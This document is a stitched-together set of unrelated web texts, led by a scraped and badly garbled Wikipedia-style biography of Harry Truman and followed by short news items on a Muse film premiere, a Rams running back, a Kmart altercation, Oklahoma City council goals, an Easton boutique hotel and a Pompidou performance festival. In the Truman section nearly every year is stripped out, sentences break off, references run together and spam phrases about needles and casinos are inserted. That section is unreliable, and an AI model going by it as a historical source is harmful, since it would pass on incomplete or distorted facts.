Truman was criticized by many for the letter. However, he pointed out that he wrote it as a loving father and not as the president. A report by the Truman administration titled To Secure These Rights presented a detailed ten-point agenda of civil rights reforms. Speaking about this report, international developments have to be taken into account, for with the UN-Charter being passed in , the question whether international human rights law could be applicable also on an inner-land basis became crucial in the United States. Though the report acknowledged such a path was not free from controversy in the s United States, it nevertheless raised the possibility for the UN-Charter to be used as a legal tool to combat racial discrimination in the United States. In February , the president submitted a civil rights agenda to Congress that proposed creating several federal offices devoted to issues such as voting rights and fair employment practices. Tales of the abuse, violence, and persecution suffered by many African-American veterans upon their return from World War II infuriated Truman, and were a major factor in his decision to issue Executive Order , in July , requiring equal opportunity in the armed forces. Another executive order, also in , made it illegal to discriminate against persons applying for civil service positions based on race. This committee ensured defense contractors did not discriminate because of race. Truman made five international trips during his presidency: In , the United States ratified the 22nd Amendment , making a president ineligible for election to a third term or for election to a second full term after serving more than two remaining years of a term of a previously elected president. Nevertheless, he seriously considered running for another term in , and left his name on the ballot in the New Hampshire primary. However all his close advisors, pointing to his age, his failing abilities, and his poor showing in the polls, talked him out of it. His first choice, Chief Justice Fred M. Vinson , had declined to run; Illinois Governor Adlai Stevenson had also turned Truman down, Vice President Barkley was considered too old, [] [] and Truman distrusted and disliked Senator Kefauver, who had made a name for himself by his investigations of the Truman administration scandals. Truman had hoped to recruit General Eisenhower as a Democratic candidate, but found him more interested in seeking the Republican nomination. Accordingly, Truman let his name be entered in the New Hampshire primary by supporters. Truman was eventually able to persuade Stevenson to run, and the governor gained the nomination at the Democratic National Convention. He pledged to clean up the "mess in Washington," and promised to "go to Korea. While Truman and Eisenhower had previously been on good terms, Truman felt annoyed Eisenhower did not denounce Joseph McCarthy during the campaign. Anti-Semitism, anti-Catholicism, and anti-foreignism" within the Republican Party. Upon leaving the presidency, Truman returned to Independence, Missouri, to live at the Wallace home he and Bess had shared for years with her mother. He also turned down numerous offers for commercial endorsements. Since his earlier business ventures had proved unsuccessful, he had no personal savings. As a result, he faced financial challenges. Once Truman left the White House, his only income was his old army pension: In , however, there was no such benefit package for former presidents, and he received no pension for his Senate service. Truman took out a personal loan from a Missouri bank shortly after leaving office, and then found a lucrative book deal for his memoirs. Memoirs by Harry S. Year of Decisions and Memoirs by Harry S. Years of Trial and Hope The former president told House Majority Leader John McCormack in , "Had it not been for the fact that I was able to sell some property that my brother, sister, and I inherited from our mother, I would practically be on relief, but with the sale of that property I am not financially embarrassed. Roosevelt, had organized his own presidential library , but legislation to enable future presidents to do something similar had not been enacted. Truman worked to garner private donations to build a presidential library, which he donated to the federal government to maintain and operate—a practice adopted by his successors. Max Skidmore, in his book on the life of former presidents, noted that Truman was a well-read man, especially in history. Skidmore added that the presidential papers legislation and the founding of his library "was the culmination of his interest in history. Together they constitute an enormous contribution to the United States—one of the greatest of any former president. In late , when Lyndon B. It has become an operational and at times a policy-making arm of the government. This has led to trouble and may have compounded our difficulties in several explosive areas. Averell Harriman of New York. After a fall in his home in late , his physical condition declined. In , President Lyndon B. Johnson signed the Medicare bill at the Harry S. He developed multiple organ failure, fell into a coma, and died at 7: Bess Truman opted for a simple private service at the library rather than a state funeral in Washington. A week after the funeral, foreign dignitaries and Washington officials attended a memorial service at Washington National Cathedral. Bess died in and is buried next to Harry at the Harry S. Truman Library and Museum in Independence, Missouri. Vigorous, hard-working, simple, he had grown up close to the soil of the Midwest and understood the struggles of the people on the farms and in the small towns. After 10 years in the Senate, he had risen above the Pendergast organization. Still, he had come from a world of two-bit politicians, and its aura was one that he never was able to shed entirely. And he did retain certain characteristics one often sees in machine-bred politicians: Citing continuing divisions within the Democratic Party, the ongoing Cold War, and the boom and bust cycle, journalist Samuel Lubell in stated: Nowhere in the whole Truman record can one point to a single, decisive break-through All his skills and energies—and he was among our hardest-working Presidents—were directed to standing still. The period following his death consolidated a partial rehabilitation of his legacy among both historians and members of the public. Truman has had his latter-day critics as well. After a review of information available to Truman about the presence of espionage activities in the U. The Dissolution of the Soviet Union in caused Truman advocates to claim vindication for his decisions in the postwar period. According to Truman biographer Robert Dallek , "His contribution to victory in the cold war without a devastating nuclear conflict elevated him to the stature of a great or near-great president. McCoy in his book on the Truman presidency:. Harry Truman himself gave a strong and far-from-incorrect impression of being a tough, concerned and direct leader. He was occasionally vulgar, often partisan, and usually nationalistic On his own terms, Truman can be seen as having prevented the coming of a third world war and having preserved from Communist oppression much of what he called the free world. Yet clearly he largely failed to achieve his Wilsonian aim of securing perpetual peace, making the world safe for democracy, and advancing opportunities for individual development internationally. In , Truman traveled to Europe with his wife. In , he helped establish the Grandview Lodge, and he served as its first Worshipful Master. In September , during his Senate re-election campaign, Truman was elected Grand Master of the Missouri Grand Lodge of Freemasonry; Truman said later that the Masonic election assured his victory in the general election. Southern Jurisdiction Headquarters in Washington D. In , the Truman Scholarship was created as a federal program to honor U. Truman Fellowship in National Security Science and Engineering was created as a distinguished postdoctoral three-year appointment at Sandia National Laboratories. Truman School of Public Affairs to advance the study and practice of governance. A member institution of the City Colleges of Chicago , Harry S Truman College in Chicago, Illinois , is named in his honor for his dedication to public colleges and universities. In , the headquarters for the State Department , built in the s but never officially named, was dedicated as the Harry S Truman Building. Truman, was erected in with donations from Greek-Americans. From Wikipedia, the free encyclopedia. For other uses, see Harry Truman disambiguation. Corporal National Guard Captain active Colonel reserve. Democratic Party vice presidential candidate selection, Truman visits his mother in Grandview, Missouri , after being nominated the Democratic candidate for vice president , July Roosevelt —Truman poster from Presidency of Harry S. If it was, half to three-quarters of them would be in jail. Truman Presidential Library and Museum. As this was prior to the adoption of the Twenty-Fifth Amendment in , a vacancy in the office of Vice President was not filled until the next ensuing election and inauguration. There is controversy over whether the period after the S should be included, or omitted, or if both forms are equally valid. New York Summit Books. A Profile of Kansas City Jewry. University of Missouri Press. The Rise to Power. From Law Office to Oval Office. The Letters from Harry to Bess Truman, — President Truman and the Cold War, — Adversaries for a Common Cause. Immigration and the Legacy of Harry S. Truman State University Press. Religion and the American Presidency. God In The Obama Era. Retrieved May 21, Was President Truman the first Baptist president? George Washington to George W. US Army Order of Battle, — Combat Studies Institute Press. Association of the United States Army, St. The Myths of Revisionism. Truman, 33rd President of the United States". Truman Library and Museum. Retrieved May 27, Truman Military Personnel File". Retrieved December 17, — via Harry S. The Real History of the Cold War: A New Look at the Past. Daniels quotes journalist Marquis Childs who wrote in November that the Truman Committee had "saved billions—yes, billions—of dollars. A Political Biography of Harry S. Truman Greenwood Press, , p. Byrd , Senate, —, Vol. The vote was tied, and Truman voted no, which, in a sense, was unnecessary since the bill would have died even without his vote. What is a 33 gauge needle used for? Bennett Champ ClarkForrest C. Soon after succeeding to the presidency he became the only world leader to have used nuclear weapons in war. Senator from Missouri Class 1 There is controversy over whether the period after the S should be included, or omitted, or if both forms are equally valid. Wikiquote has jackpot zahlen freitag related to: The 80th Congress included Republican freshmen who would become prominent in U. The Myths of Revisionism. King John C. Kleider casino States Senators from Missouri. Association of the United States Army, St. Calvin Coolidge — Lived: Truman believed this would entail an unacceptable risk of war.
Paramount Pictures has decided to team up with a little UK band some of you may be familiar with, Muse, featuring a number of tracks from their latest chart-topping album The 2nd Lawin the upcoming film, WORLD WAR Z. The film’s London premiere will take place on June 2 in Leicester Square followed by a live concert performance by Matt Bellamy and co. from Horse Guards Parade Ground, St. James’s Park. The concert tickets will become available for free, Tuesday, May 28 at 9:00 a.m. BST via a special ticketmaster link and code here as well as via the Muse email list and various partner promotions so keep your eyes peeled. The Marc Forsterdirected WORLD WAR Z hits cinemas on June 21 and follows an ex-United Nations investigator Gerry Lane (Brad Pitt), crossing the world in an attempt to eradicate a pandemic that is toppling armies and governments and threatening to destroy humanity. Pitt stars alongside Mireille Enos (The Killing) and James Badge Dale (Iron Man 3). Given Matt Bellamy’s penchant for end-of-the-world lyricisms it’s no surprise Universal opted to feature some of their latest tracks in this zombie epidemic epic. Get ready for the premiere and concert this June 2 as it’s going to be Ma,ma,ma,ma,ma,ma,madness….. We’ll leave you with a special video produced in celebration of this once in a lifetime collaboration. Howard currently writes for a number of popular online publications including: Comedy Chords, Consequence of Sound, MusicOMH, Fresh on the Net (created by BBC 6 Music’s Tom Robinson) and The Huffington Post Comedy section.
Getty Images Running back Daryl Richardson only played four snaps in the team’s second preseason game. It wasn’t because he’s falling out of favor with the coaching staff, though. It’s because the team has already seen all that they needed to see from Richardson to know that he’d be in the backfield when the offense opens up the season against the Cardinals. That was coach Jeff Fisher’s explanation at a Monday press conference that confirmed where things have been heading for some time. “From a starting standpoint, yeah, I think Daryl would probably take the first snap against Arizona,” Fisher said. It doesn’t hurt that Isaiah Pead won’t be available Week One because of a suspension, but Fisher made it clear that Richardson wasn’t starting by default. Fisher has said that he doesn’t anticipate having a bell cow back, so Pead should still see a good amount of work. Being the first guy up always has its advantages, though, and Richardson looks like a good fit for the overall move toward more spread looks after the acquisitions of Tavon Austin and Jared Cook.
A woman in a NSW Kmart has been captured on video launching an aggressive rant at an employee who asked to check her trolley. A witness recorded the woman swearing at the worker at the Newcastle store and ramming her trolley into him at the security gates in front of Christmas shoppers. The mobile phone footage, recorded Friday evening, catches the woman yelling to the security worker “this is my s***.” View photos A woman yells and swears at a NSW Kmart security worker who tried to stop her leaving the store with a full trolley. Source: Facebook More When the employee takes hold of the trolley from the woman who is trying to exit the store, the woman yells at him: “Don't f***ing touch it.” She appears to yank the trolley away from the worker, telling him: “Let it go you f***ing dog.” View photos The woman rams her trolley into him at the security gates, as shocked Christmas shoppers watched. Source: Facebook More “Don't touch my f***ing trolley.” The man who filmed the scene told the Daily Mail about 100 people, including children and his grandmother, were stunned to watch the woman abusing the staff member. View photos The woman becomes aggressive when the employee takes hold of her trolley but she refuses to let it go. Source: Facebook More NSW Police confirmed a 35-year-old woman was issued with a "move on direction" after an incident at a Waratah shopping centre retail store on Friday. "About 8.30pm, the woman became aggressive when she was spoken to by an employee," the police told Yahoo7 in a statement. "Nearby police who witnessed the incident develop spoke to the woman before issuing her a move on direction to leave the area." A Kmart spokesperson told Yahoo7 the company was unable to comment on the incident as it was a police matter. Retailers urged Christmas Eve shoppers to be patient and expect some delays at the checkout despite extra staff.
Public safety to social justice reform: Council lists its priorities for Oklahoma City City council members are handing Oklahoma City a grade of 'A' for financial management. The council assessed the city's progress in meeting its top goals and tweaked its priorities for the upcoming year at a workshop this week. The council met in the first-floor conference room at the new downtown police headquarters. Grades on current priorities ranged from 'A' for maintaining strong financial management to 'C+' for roads and transit.
The 152-year-old mansion, on a block once known as “Millionaire’s Row,” housed prominent local families over the years before being converted into a rooming house and later a doctor’s office. Now the long-vacant building at 130 N. Third St. is being prepared for its next reincarnation as a boutique hotel with 16 rooms, providing a small segment of guest rooms that city officials say are especially needed since the demolition of the Days Inn on South Third Street this year. Restaurateur Mick Gjevukaj started construction on the $2 million boutique hotel last month. By spring, he says the 16-room hotel called Era will be finished. “For the first time in years, it feels like the building can breathe again. I can see the building coming back to life,” Gjevukaj said of the property once owned by Grace Bixler, stepdaughter of Herman Simon. He owned the historic Simon Mansion — where Third Street Alliance is now located — a few doors down. Gjevukaj and his architect, Jeffrey Martinson of The Martinson Group in Easton, recently shared renderings of what the finished hotel will look like. CONTRIBUTED PHOTO / THE MORNING CALL A rendering shows what "Era," a boutique hotel with 16 rooms at 130 N. Third St. in Easton, will look like when it is finished. A rendering shows what "Era," a boutique hotel with 16 rooms at 130 N. Third St. in Easton, will look like when it is finished. (CONTRIBUTED PHOTO / THE MORNING CALL) The original portion of the building dating to 1866 will be completely restored, including its grand wooden staircase and fireplaces framed by Mercer tiles. Additions at the rear of the building that were added in 1925 are being demolished and replaced. When it’s finished, the hotel will have three sections: The original portion; a middle section that will include the lobby area, and a rear section with rooms decorated in a modern style. The original section will have eight rooms with historical elements such as dark wood trim and tiles with illustrations of birds and flowers. The middle section above the lobby will have four rooms, with another four rooms in the rear section. There will be two suites in the historical section, and two suites with large corner windows in the rear section. There will also be a sitting area in the back with mature trees and flower gardens to complement the ornate architecture of the Queen Anne-style Victorian. CONTRIBUTED PHOTO / THE MORNING CALL A rendering shows what "Era," a boutique hotel with 16 rooms at 130 N. Third St. in Easton, will look like when it is finished. A rendering shows what "Era," a boutique hotel with 16 rooms at 130 N. Third St. in Easton, will look like when it is finished. (CONTRIBUTED PHOTO / THE MORNING CALL) Gjevukaj estimates room rates will start at about $150 a night, up to $250 a night for a suite. This won’t be a chain hotel. “It’s somewhere you go for a special occasion,” he said. The project hasn’t been without difficulties. Contractors recently removed a two-story garage from the property and decades of overgrowth, including an abundance of poison ivy that made the workers break out in rashes. The building was shuttered for so long, Gjevukaj said, workers had to initially wear masks to protect them from the musty interior. Because the property is so narrow — about 30-feet wide by 250-feet long — workers have had to complete the demolition by hand to protect neighboring properties, he said. In May, the city’s Zoning Hearing Board agreed to a parking variance for the project, but attached a condition that the developer must provide one off-street parking spot for each of the 16 guest rooms. Gjevukaj plans to pave a three-spot lot at the rear of the building that will also serve as a drop-off point for guests and a service truck space for garbage and deliveries. He said Friday he is still talking to neighboring property owners about leasing parking. Under the city’s zoning law, the new hotel would be permitted to provide off-site, off-street spaces as long as they are within 600 feet of the building. Gjevukaj also has the option of providing valet parking within 850 feet. Planning Commission member Robert Sun, who lives down the block from the Townley, said he is in favor of the project. “I saw their plans and I am excited. This is a beautiful building and deserves to have new life breathed into it,” Sun recently said. CHRISTINA TATU / THE MORNING CALL The Townley Building in May 2018. The Townley Building in May 2018. (CHRISTINA TATU / THE MORNING CALL) Mayor Sal Panto Jr. said even if the boutique hotel is completed, Easton will need more hotel rooms. Panto wants to bring in a hotel with 60-70 rooms and a conference center to replace the 80 rooms that were lost with the demolition of the Days Inn. Panto said the city has not received plans for another hotel at this point.
Already a performance touchstone, Performance Day is spreading its wings as part of the Centre Pompidou's 40th anniversary celebrations. Six international curators are joining forces for the programming of a festival combining the visual arts, theatre, film, music and literature, with a particular focus on the French and Portuguese scenes. Performance Day is presenting fifteen artists, eight premieres, two exhibitions and Digressions, a new collection of conversations with artists. For Performance Day, the six curators will be looking into the topic of the museum performed: in practical terms how does a museum make history, what living memory does it build up, and what future is it modelling? To what extent does it contribute to a process of reification and at what point in time does it become a malleable object, transformed by historical, discursive, gestural and fictional sedimentations? Since the 1960s–1970s artists have been constantly challenging the museum as institution: its representational codes and dominant forms of rhetoric, its capacity to reify and standardise, its modes of exhibition and dissemination, its relationship with archives and collections, and the role it assigns to viewers and transmission. Today a whole generation of artists is revitalising what used to be called "institutional criticism" via alternative narratives that are allowing subjective, minority and subaltern voices to be heard. At once poetic and political, their proposals grant pride of place to the invisible and the intangible, and to receptivity and attentiveness. Via interpersonal give and take, talks, guided tours, handling of objects and musical and theatrical interpretations, artists are performing singular stories of museums and art collections. What is the Performance Day ? In 2016, La Ferme du Buisson inaugurated Performance Day, an annual performance festival whose international programming would include curators from abroad with an emphasis on coproductions and freedom of movement for artists. Given artists' growing interest in an interspace between the visual and the performing arts, our art centre is broadening its approach to include other other sections of La Ferme du Buisson, and thus other resources, with a variety of projects involving the entire site: theatres, studios, outdoor spaces, the media library and so on. In this fundamentally multidisciplinary context these hybrid practices using performance as an active force in the transgression of boundaries find unequalled scope for experimentation. Deliberately concentrated into a single day, the festival will give visitors the chance to share a unique experience as they stroll from event to event and from space to space in a truly remarkable setting. With this second edition the festival is spreading its wings, joining in the Centre Pompidou's 40th anniversary celebrations and happening in two different venues: La Ferme du Buisson and the Centre Photographiqued’Ile-de-France. The programming has been arranged in association with the Centre Photographiqued’Ile-de-France, Frac Ile-de-France and Serralves-Museu de Arte Contemporânea in Porto, which came up with its own "Museum as Performance" programme in 2015. SoixanteDixSept [SeventySeven] Via the SoixanteDixSept [SeventySeven] project three key contemporary art venues in Seine-et-Marne (France's département no. 77) are recalling the emblematic date – 1977 – of the opening of the Centre Pompidou, that "power plant for decentralisation", and reviving the spirit of an era on a broad geographic front. The project takes a look at a specific vision of art and society, a crucial utopic impulse that still fuels contemporary creativity. This reassessment forty years down the track brings an understanding of the museum's active role in history, as a force for conservation but also for shaping a future. The 40th anniversary of the Centre Pompidou The Centre Pompidou celebrates its 40th anniversary in 2017 everywhere in France. To share its anniversary with a wider audience, the Centre Pompidou will be presenting a completely new programme of exhibitions, outstanding loans and various events throughout the year. Exhibitions, shows, concerts and meetings will be staged in 40 French cities in partnership with museums, contemporary art centres, performance halls, a festival, a key player in France’s cultural and artistic fabric and many more.